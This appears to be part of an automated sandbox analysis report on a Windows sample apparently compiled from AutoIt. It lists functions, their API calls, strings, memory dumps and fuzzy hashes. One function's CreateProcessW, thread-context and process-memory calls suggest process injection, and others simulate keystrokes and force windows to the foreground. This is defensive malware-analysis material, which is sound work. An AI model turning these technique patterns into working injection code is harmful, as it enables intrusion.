API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: b6070de7e95b63457384120595cf140ef9454592ca3835305ac027210860dea3
Instruction ID: 318c5d5e731fe41b6fef26192fb0546246f95aa7a1db71706a4fd8d4d9a32628
Opcode Fuzzy Hash: b6070de7e95b63457384120595cf140ef9454592ca3835305ac027210860dea3
Instruction Fuzzy Hash: 34F0F43540031EA6CB17BBA5EC019EF7BAC9F01310F1004A6FD149A281DFB09A8883D1

Function 003853A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00388B28: __getptd_noexit.LIBCMT ref: 00388B28

__lock_file.LIBCMT ref: 003853EB

Part of subcall function 00386C11: __lock.LIBCMT ref: 00386C34

__fclose_nolock.LIBCMT ref: 003853F6

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 22580836e1cee28497bb39efc7271d78d18f0fd3720244346dc71c0ff3a2b8f1
Instruction ID: a87f1ecb5b7b55af8e1c857d4cd5a220cb19d91c3e6b99c2eea45e993a0708cf
Opcode Fuzzy Hash: 22580836e1cee28497bb39efc7271d78d18f0fd3720244346dc71c0ff3a2b8f1
Instruction Fuzzy Hash: 43F0B431801B049ADB23BF7598067AD7BE06F41375F6582C9E424AF1C1CFFC8A419B52

Function 00E77765 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00E77F23
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E77FB9
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E77FDB

Memory Dump Source

Source File: 00000000.00000002.1337653140.0000000000E76000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E76000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e76000_aBEh0fsi2c.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
Instruction ID: 6883ab89a0a3dec2578c1e1d1d6075c4c515a8bb5b44bf31a6c9b2685f26933d
Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
Instruction Fuzzy Hash: A412C024E14658C6EB24DF64D8507DEB272EF68300F10A0E9910DEB7A5E77A4F81CF5A

Function 00380C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00380CB7

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 4d7b0a8849ebf0008d9c4bbb4d330e655d8fbd9f62c57faa3419a71fbf22d6f9
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 5131E270A002059FCB9AEF58C494A69F7B6FB49300B2586E5E80ACF751D631EEC5DB80

Function 0039FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0039FCB7

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 1278f01d2574e2d4fdc738452f7baf278147b03ea4f48bb01117c135eee1e93b
Instruction ID: 2ee5b246e636f77ed7685bf23557f6219090282e0d45dbf482b9ed6a9367c98e
Opcode Fuzzy Hash: 1278f01d2574e2d4fdc738452f7baf278147b03ea4f48bb01117c135eee1e93b
Instruction Fuzzy Hash: 754127745047518FDB26DF24C454B1ABBE0BF45318F09C8ACE89A9B766C732E845CF52

Function 00367B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00367BB3

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 6c6500a46772b76bae893456c1ac7a3ccb4a10f7aea5403709b5bda715c2235f
Instruction ID: 9723ef57a606e467007e1a75d087b4233bbe752d0240b076cf5a85b95976760f
Opcode Fuzzy Hash: 6c6500a46772b76bae893456c1ac7a3ccb4a10f7aea5403709b5bda715c2235f
Instruction Fuzzy Hash: 1C213672604B09EBDF169F11F8417AA7BB8FB14350F21C46DE486CA194EB3095D0CB49

Function 0036784B Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00367899

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 4bc516ce2b159df6ae561d16dde780559593b119f0329b2b52b7213471dda11b
Instruction ID: 049e89f7a235be5fd5b14a1a83eb7f010907fa2f807b51f0acb7e250de0ad1c2
Opcode Fuzzy Hash: 4bc516ce2b159df6ae561d16dde780559593b119f0329b2b52b7213471dda11b
Instruction Fuzzy Hash: 5B11E431208205ABC716DF28C886C6AB7A9EF45328764C61AF919CB398DB32EC11C790

Function 00364DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00364BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00364BEF

Part of subcall function 0038525B: __wfsopen.LIBCMT ref: 00385266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00364E0F

Part of subcall function 00364B6A: FreeLibrary.KERNEL32(00000000), ref: 00364BA4

Part of subcall function 00364C70: _memmove.LIBCMT ref: 00364CBA

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: c4ae379b7e5c62f9828c55d32478d81b19e148bf9535258a9638f019abbb8fa3
Instruction ID: fb2d8bf72d85372810e1b8339cb9e3da24de277cfe77e1771f4808bf14f36c04
Opcode Fuzzy Hash: c4ae379b7e5c62f9828c55d32478d81b19e148bf9535258a9638f019abbb8fa3
Instruction Fuzzy Hash: 4211E331A00205ABCF13BF70C816FAD77A8AF44710F10C829F541AF1C5DEB29A009BA1

Function 0039FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 0039FD91

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 8f1239c7572f3cacd7808f59993a474258d89301221991f0f633bf4abc5b4b89
Instruction ID: f7cd2dded75aecf3129e27e4acb6a248c304ababda98aea73f2a880455e7be0d
Opcode Fuzzy Hash: 8f1239c7572f3cacd7808f59993a474258d89301221991f0f633bf4abc5b4b89
Instruction Fuzzy Hash: A2211374908741DFCB26DF64C454A1ABBE4BF88314F05896CF88A9B762D731E809CF92

Function 0038072A Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003807B0

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: c88b1d45fa533082644f8eec5a8da90621851afedfa5cc1a530cc671d9e8539b
Instruction ID: 933d014c8b5d0bfcb88b19bafd2a9c78d90a05b2f2c92ff0dda46ebec127eadd
Opcode Fuzzy Hash: c88b1d45fa533082644f8eec5a8da90621851afedfa5cc1a530cc671d9e8539b
Instruction Fuzzy Hash: 3E01D671446944AFD712CB24E8C1EF877E8EF86220B1505E6ED48CBC35C62098D8CB91

Function 00384863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 003848A6

Part of subcall function 00388B28: __getptd_noexit.LIBCMT ref: 00388B28

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 75ef7f13b69a37f5739f69d1e4505f902a8b200fa61a484f09ac1503a6518ff7
Instruction ID: 77f984f156d0bbc1a34e58e5152bdc821f53183d951162d0cb54838bc28d98ea
Opcode Fuzzy Hash: 75ef7f13b69a37f5739f69d1e4505f902a8b200fa61a484f09ac1503a6518ff7
Instruction Fuzzy Hash: 38F0C23190070AEBDF13BFB48C067EE3AA1AF00325F558494F4249E592CB79CA51DF51

Function 00364E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,004252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00364E7E

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: c8211da3005f915916b132b824a403448e220528d0430e2290d176c464f6a8a7
Instruction ID: 1edd2c9a8ad3afe7e143aee22228db0f724ebc5ceceedf6b616bd719dfda4076
Opcode Fuzzy Hash: c8211da3005f915916b132b824a403448e220528d0430e2290d176c464f6a8a7
Instruction Fuzzy Hash: BEF01571901B11CFCB369F64E494812BBE5BF14329321CA7EE1D686A24C7739840DB40

Function 00380791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003807B0

Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 4c64a454ed80057744597ffae654d0455b5a149846094e8ba502d7e23e65a2ba
Instruction ID: 863b9c71ffb9d930ee4711c2f0b203e07620095b8c090898e79d59ba1bc8a9d9
Opcode Fuzzy Hash: 4c64a454ed80057744597ffae654d0455b5a149846094e8ba502d7e23e65a2ba
Instruction Fuzzy Hash: BAE0CD369041285BC721D6589C05FFA77DDDF897A0F0442B5FD0CDB248DA609C8086D0

Function 0038525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00385266

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: a4d3d7d242977b5a8b57a95baa685f8487ac5c22ea5aac9b9a86dafda0d054ca
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: C5B0927644020C77CE022A82EC02A493B299B41764F408060FB0C1C162AA73A6649A89

Function 00E78768 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00E78779

Memory Dump Source

Source File: 00000000.00000002.1337653140.0000000000E76000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E76000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e76000_aBEh0fsi2c.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: af97dfdc726d40d09895ba04125c9bb0ad8008d5f16348b9cdb32079e1420672
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 65E0E67498020DDFDB40DFB4D64D69D7BB4EF04301F104161FD05E2280DA309D50CA62

Non-executed Functions

Function 003ECABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00362612: GetWindowLongW.USER32(?,000000EB), ref: 00362623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 003ECB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003ECB95
GetWindowLongW.USER32(?,000000F0), ref: 003ECBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003ECC00
SendMessageW.USER32 ref: 003ECC29
_wcsncpy.LIBCMT ref: 003ECC95
GetKeyState.USER32(00000011), ref: 003ECCB6
GetKeyState.USER32(00000009), ref: 003ECCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003ECCD9
GetKeyState.USER32(00000010), ref: 003ECCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003ECD0C
SendMessageW.USER32 ref: 003ECD33
SendMessageW.USER32(?,00001030,?,003EB348), ref: 003ECE37
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 003ECE4D
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 003ECE60
SetCapture.USER32(?), ref: 003ECE69
ClientToScreen.USER32(?,?), ref: 003ECECE
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 003ECEDB
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003ECEF5
ReleaseCapture.USER32 ref: 003ECF00
GetCursorPos.USER32(?), ref: 003ECF3A
ScreenToClient.USER32(?,?), ref: 003ECF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 003ECFA3
SendMessageW.USER32 ref: 003ECFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 003ED00E
SendMessageW.USER32 ref: 003ED03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 003ED05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 003ED06D
GetCursorPos.USER32(?), ref: 003ED08D
ScreenToClient.USER32(?,?), ref: 003ED09A
GetParent.USER32(?), ref: 003ED0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 003ED123
SendMessageW.USER32 ref: 003ED154
ClientToScreen.USER32(?,?), ref: 003ED1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 003ED1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 003ED20C
SendMessageW.USER32 ref: 003ED22F
ClientToScreen.USER32(?,?), ref: 003ED281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 003ED2B5

Part of subcall function 003625DB: GetWindowLongW.USER32(?,000000EB), ref: 003625EC

GetWindowLongW.USER32(?,000000F0), ref: 003ED351

Strings

F, xrefs: 003ED235
@GUI_DRAGID, xrefs: 003ECE9C
pbB, xrefs: 003ECEAF

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F$pbB
API String ID: 3977979337-2595871605
Opcode ID: 4714859737c231d10407a95a69f7209bff56bb18fe2bedf814b256774a2604d8
Instruction ID: f0f56e86ba83f277df28317c02081c8e4a4f6e27bbde4262c5521dddf4c2a8e3
Opcode Fuzzy Hash: 4714859737c231d10407a95a69f7209bff56bb18fe2bedf814b256774a2604d8
Instruction Fuzzy Hash: 9E42CD342042D1AFDB26DF26C884AAABBE9FF49310F150A29F555CB2F0C771D852DB91

Function 00376F9E Relevance: 55.8, APIs: 19, Strings: 10, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 003771C3
_memset.LIBCMT ref: 00377539
_memmove.LIBCMT ref: 003776AC

Strings

[:<:]], xrefs: 00377479
\b(?=\w), xrefs: 003B3769
P\A, xrefs: 003B1AB8
_7, xrefs: 003B23CB
[:>:]], xrefs: 00377492
\b(?<=\w), xrefs: 003B3773
]A, xrefs: 003B1A22
Q\E, xrefs: 00377FCB
3c7, xrefs: 003B23A0
DEFINE, xrefs: 003B2103

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: _memmove$_memset
String ID: ]A$3c7$DEFINE$P\A$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_7
API String ID: 1357608183-3946336730
Opcode ID: 58f90922ac46001c1da9d4a1e1c980be59b8e96707a0f799d06a774d2b12c790
Instruction ID: c404c411815d4621a5abf846e174d230fb8318a6e7c93d6c25fc525735fd8ed9
Opcode Fuzzy Hash: 58f90922ac46001c1da9d4a1e1c980be59b8e96707a0f799d06a774d2b12c790
Instruction Fuzzy Hash: B793B375E00215DBDB26CF58C881BEDB7B1FF48314F25816AEA49EB681E7749E81CB40

Function 003648D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 003648DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0039D665
IsIconic.USER32(?), ref: 0039D66E
ShowWindow.USER32(?,00000009), ref: 0039D67B
SetForegroundWindow.USER32(?), ref: 0039D685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0039D69B
GetCurrentThreadId.KERNEL32 ref: 0039D6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 0039D6AE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0039D6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 0039D6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 0039D6CF
SetForegroundWindow.USER32(?), ref: 0039D6D2
MapVirtualKeyW.USER32(00000012,00000000), ref: 0039D6E7
keybd_event.USER32(00000012,00000000), ref: 0039D6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 0039D6FC
keybd_event.USER32(00000012,00000000), ref: 0039D701
MapVirtualKeyW.USER32(00000012,00000000), ref: 0039D70A
keybd_event.USER32(00000012,00000000), ref: 0039D70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 0039D719
keybd_event.USER32(00000012,00000000), ref: 0039D71E
SetForegroundWindow.USER32(?), ref: 0039D721
AttachThreadInput.USER32(?,?,00000000), ref: 0039D748

Strings

Shell_TrayWnd, xrefs: 0039D660

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 6ced1565e6ff74db442f456c59312e3eaeda79f8dbd524657ed40626fd2a3d9b
Instruction ID: 642f822bd2240e4c38d888727cb78c8fe6e8e9668414d566be5a52567aacc48b
Opcode Fuzzy Hash: 6ced1565e6ff74db442f456c59312e3eaeda79f8dbd524657ed40626fd2a3d9b
Instruction Fuzzy Hash: 91317271A40358BFEF326FA19C8AF7F7E6CEB44B50F114125FA04EA1D1C6B15940AAA0

Function 003CC75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 003CC78D
FindClose.KERNEL32(00000000), ref: 003CC7E1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003CC806
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003CC81D
FileTimeToSystemTime.KERNEL32(?,?), ref: 003CC844
__swprintf.LIBCMT ref: 003CC890
